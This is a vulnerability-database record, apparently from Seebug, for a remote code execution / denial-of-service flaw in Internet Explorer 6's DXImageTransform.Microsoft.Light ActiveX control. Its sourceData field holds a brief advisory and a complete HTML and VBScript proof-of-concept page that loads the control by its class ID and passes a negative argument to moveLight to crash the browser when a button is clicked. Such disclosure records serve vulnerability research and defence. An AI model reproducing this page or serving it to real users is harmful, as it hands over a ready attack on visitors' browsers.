Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-81568", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-81568", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/18303/info\r\n\r\nThe DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. \r\n\r\nAn attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.\r\n\r\n<!--\r\nMS Internet Explorer 6 DirectX Media DoS Vulnerability\r\nDLL: dxtmsft.dll\r\n\r\nDiscovered & Coded by: r0ut3r (writ3r [at] gmail.com)\r\n\r\nDescription: \r\nSub moveLight (\r\n \tByVal lightNum As Long , \r\n \tByVal x As Long , \r\n \tByVal y As Long , \r\n \tByVal z As Long , \r\n \tByVal fAbsolute As Long \r\n)\r\nSupplying negative parameters throws an access violation. \r\n-->\r\n\r\n<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">\r\n\tUnable to create object\r\n</object>\r\n\r\n<script language="vbscript">\r\n\tSub go\r\n\t\tDXTLight.moveLight "-1", "1", "1", "1", "1"\r\n\tEnd Sub\r\n</script>\r\n<input language=VBScript type="button" value="Try me" onclick="go()">\r\n\r\n\n ", "id": "SSV:81568", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:58:35", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645253586, "score": 1659785532, "epss": 1678850553}}
{}